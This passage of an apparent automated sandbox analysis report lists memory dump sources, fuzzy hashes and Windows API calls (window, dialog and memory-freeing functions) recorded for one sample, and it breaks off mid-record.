                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                                              • Instruction ID: f0f83896ac5b0187c2489758e76c7d2f6dc23957fb434bf2034b91c66f4e1600
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C512661E44E4756DF3845288B6BFBF27C5AB41B20F58091DE882CB282C609FDC5F295
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ad7ad249a5b0c59ee74070fc319877e736bd5d8e68e9db017875d259a2d43356
                                                                                                                                                                                              • Instruction ID: bb25744f31cf69f8de654274ac75411b284607df623628c1058c58c5052322a9
                                                                                                                                                                                              • Opcode Fuzzy Hash: ad7ad249a5b0c59ee74070fc319877e736bd5d8e68e9db017875d259a2d43356
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8251E3B19083D58EC701DF64C54046EBFE1AF9B324F4949AEE4D95F243C220DA4EEB62
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: da0e890de1c7cd104905b9d6eb01196baaa7825c5fd4e42ac0d61edcdb3bfd96
                                                                                                                                                                                              • Instruction ID: eb2e12f94103545ee40a92a31978879050e680efc2832dd3e7a7aba42bbb8ed4
                                                                                                                                                                                              • Opcode Fuzzy Hash: da0e890de1c7cd104905b9d6eb01196baaa7825c5fd4e42ac0d61edcdb3bfd96
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951DFB1A087119FC748CF19D88055AF7E1FF88354F058A2EE899E3740DB34E959CB96
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                                              • Instruction ID: 2adf4b456e2affa91b5c95f85c63f439e7247f8e41014bb4404d673652f579d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                                              • Instruction Fuzzy Hash: F831C4B1A547468FCB18DF29C8512AABBE0FB95314F10452DE495C7342C739EA0ADF91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FAE30E
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                                • Part of subcall function 00FB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FE1030,00000200,00FAD928,00000000,?,00000050,00FE1030), ref: 00FB1DC4
                                                                                                                                                                                              • _strlen.LIBCMT ref: 00FAE32F
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00FDE274,?), ref: 00FAE38F
                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00FAE3C9
                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00FAE3D5
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FAE475
                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00FAE4A2
                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00FAE4DB
                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00FAE4E3
                                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00FAE4EE
                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FAE51B
                                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00FAE58D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                              • String ID: $%s:$CAPTION$d
                                                                                                                                                                                              • API String ID: 2407758923-2512411981
                                                                                                                                                                                              • Opcode ID: 5c7e3ed6f4b96cfe3462b03a7f45e3a4d2c759fab3a583a59e61e2e827a48033
                                                                                                                                                                                              • Instruction ID: fbfbf305bd79d914bab1413a8e76dda5978834034e7d9a2e15e57e77624a0aca
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7e3ed6f4b96cfe3462b03a7f45e3a4d2c759fab3a583a59e61e2e827a48033
                                                                                                                                                                                              • Instruction Fuzzy Hash: D38190B2608301AFD711DF68CD89AABBBE9FBCD714F04091DFA84D7240D635E9059B52
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00FCCB66
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC71E
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC730
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC742
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC754
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC766
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC778
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC78A
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC79C
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7AE
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7C0
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7D2
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7E4
                                                                                                                                                                                                • Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7F6
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCB5B
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCB7D
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCB92
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCB9D
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCBBF
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCBD2
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCBE0
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCBEB
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCC23
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCC2A
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCC47
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCCC5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                              • Opcode ID: d64593aa446e2b4b19ee83c120725a08c430d69e64c663c25a1ed3fd490e1edd
                                                                                                                                                                                              • Instruction ID: 4181ee1074683a1479643b8c585f6384e8a080f4946d4245e4268bab7cf26583
                                                                                                                                                                                              • Opcode Fuzzy Hash: d64593aa446e2b4b19ee83c120725a08c430d69e64c663c25a1ed3fd490e1edd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D314C31A002079FEB20AA78EE47F5AB7E9AF50360F15441DE18DD7192DF35AC42EB90
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB9736
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB97D6
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00FB97E5
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FB9806
                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FB982D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                              • API String ID: 1777411235-4209811716
                                                                                                                                                                                              • Opcode ID: 27a8820d2f535c2fe7aa9534b2ab4a3943335dee21d035df443b8d2d0218e719
                                                                                                                                                                                              • Instruction ID: d708d30b12ba13a4364f2eefaf654d1fb22f464fd655d51cd958f1fe65558c51
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27a8820d2f535c2fe7aa9534b2ab4a3943335dee21d035df443b8d2d0218e719
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82311C3250C3127BD725AB359C47FAF77989F42720F14011EF601961D2EFA8D909ABA6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00FBD6C1
                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00FBD6ED
                                                                                                                                                                                                • Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1
                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00FBD709
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FBD720
                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00FBD734
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FBD75D
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FBD764
                                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00FBD76D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                              • String ID: STATIC
                                                                                                                                                                                              • API String ID: 3820355801-1882779555
                                                                                                                                                                                              • Opcode ID: a6a6e58a01ea7e945967b68209e9eae729bacd1934b702af4b987a4b07f6ec2b
                                                                                                                                                                                              • Instruction ID: 213622abaad2e3aef1fd8dd78a110f93bd7c51d094d1c69d1ad0add8b9667a44
                                                                                                                                                                                              • Opcode Fuzzy Hash: a6a6e58a01ea7e945967b68209e9eae729bacd1934b702af4b987a4b07f6ec2b
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7113A725013107FE633AB729C4AFEF7A5CBF44711F004121FA81A6085EA6ECA056FA6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9705
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9711
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC971C
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9727
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9732
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC973D
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9748
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9753
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC975E
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC976C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: 03adf403c5776fed684c47d0c6574214706cc86e75701fddd0986d6146f6ad05
                                                                                                                                                                                              • Instruction ID: 36a0da93b25d09faf3ec422e9db319141ea967269ec80b0c3e9b5f35c3bcf04f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03adf403c5776fed684c47d0c6574214706cc86e75701fddd0986d6146f6ad05
                                                                                                                                                                                              • Instruction Fuzzy Hash: E811D77510000AAFCB01EF58DE42ED93BB5EF14390B0254A9FA098F262DE35DA52AB84
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                              • API String ID: 322700389-393685449
                                                                                                                                                                                              • Opcode ID: d94e94da3e712f58de574c07a472879279b0888902ae464ac4bf66155390fddd
                                                                                                                                                                                              • Instruction ID: 05c5c4b99689a40fc3745449452682df6b13081ac8df42ba19cbaecaaa92e55b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d94e94da3e712f58de574c07a472879279b0888902ae464ac4bf66155390fddd
                                                                                                                                                                                              • Instruction Fuzzy Hash: DDB15A71D0020AEFCF29DFA4CA42EAEB7B5EF04364F14815DE8116B212D739DA51EB91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA6FAA
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA7013
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA7084
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                              • API String ID: 3122303884-3508440684
                                                                                                                                                                                              • Opcode ID: 25ff06761e3fa58d258dcf5a24cbf9f4585a1fa3a262ae879f9a2249f0b54ea6
                                                                                                                                                                                              • Instruction ID: e26f291617b2e346669ad083989a5b033e00f38458e206cb90664c3bd3d7cdd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25ff06761e3fa58d258dcf5a24cbf9f4585a1fa3a262ae879f9a2249f0b54ea6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A41E4F1D08744BAEB20F7709D82FEE77ACAF06314F044455FA45A6182D778AA48E721
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00FBB610
                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FBB637
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FBB650
                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00FBB661
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00FBB66A
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FBB67E
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FBB694
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                                                                              • API String ID: 3214253823-2177901306
                                                                                                                                                                                              • Opcode ID: e169954f1fb316bd3dac6e6a4985626b4ac39aec1728b8e213e16f9987eaba8c
